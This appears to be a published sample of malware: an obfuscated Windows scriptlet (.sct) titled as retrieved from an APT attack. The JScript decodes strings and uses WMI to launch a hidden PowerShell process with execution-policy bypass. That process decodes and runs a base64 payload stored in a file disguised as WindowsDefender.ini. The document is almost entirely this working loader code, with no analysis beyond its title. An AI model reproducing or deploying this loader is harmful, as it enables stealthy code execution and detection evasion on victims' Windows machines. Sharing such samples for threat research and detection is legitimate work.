Retrieved Scriptlet for an APT attack

<?xml version="1.0" encoding="utf-8"?>
<package>
  <component
    id="x">
    <registration
      description="x"
      progid="x"
      version="1.00"
      remotable="True">
      <script language="JScript"><![CDATA[
var a=['K2d3wr0='];(function(c,d){var e=function(f){while(--f){c['push'](c['shift']());}};e(++d);}(a,0x1f3));var b=function(c,d){c=c-0x0;var e=a[c];if(b['FloEtK']===undefined){(function(){var f;try{var g=Function('return (function() '+'{}.constructor("return this")( )'+');');f=g();}catch(h){f=window;}var i='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';f['atob']||(f['atob']=function(j){var k=String(j)['replace'](/=+$/,'');for(var l=0x0,m,n,o=0x0,p='';n=k['charAt'](o++);~n&&(m=l%0x4?m*0x40+n:n,l++%0x4)?p+=String['fromCharCode'](0xff&m>>(-0x2*l&0x6)):0x0){n=i['indexOf'](n);}return p;});}());var q=function(r,s){var t=[],u=0x0,v,w='',x='';r=atob(r);for(var y=0x0,z=r['length'];y<z;y++){x+='%'+('00'+r['charCodeAt'](y)['toString'](0x10))['slice'](-0x2);}r=decodeURIComponent(x);for(var A=0x0;A<0x100;A++){t[A]=A;}for(A=0x0;A<0x100;A++){u=(u+t[A]+s['charCodeAt'](A%s['length']))%0x100;v=t[A];t[A]=t[u];t[u]=v;}A=0x0;u=0x0;for(var B=0x0;B<r['length'];B++){A=(A+0x1)%0x100;u=(u+t[A])%0x100;v=t[A];t[A]=t[u];t[u]=v;w+=String['fromCharCode'](r['charCodeAt'](B)^t[(t[A]+t[u])%0x100]);}return w;};b['MXQoVI']=q;b['zRoKdr']={};b['FloEtK']=!![];}var C=b['zRoKdr'][c];if(C===undefined){if(b['NSVger']===undefined){b['NSVger']=!![];}e=b['MXQoVI'](e,d);b['zRoKdr'][c]=e;}else{e=C;}return e;};var cm='powershell.exe -exec Bypass -c iex([System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String((get-content C:\\ProgramData\\WindowsDefender.ini))))';var w32ps=GetObject('winmgmts:')['Get']('Win32_ProcessStartup');w32ps['SpawnInstance_']();w32ps['ShowWindow']=0x0;var rtrnCode=GetObject('winmgmts:')['Get']('Win32_Process')['Create'](cm,b('0x0','t#b5'),w32ps,null);
]]></script>
    </registration>
  </component>
</package>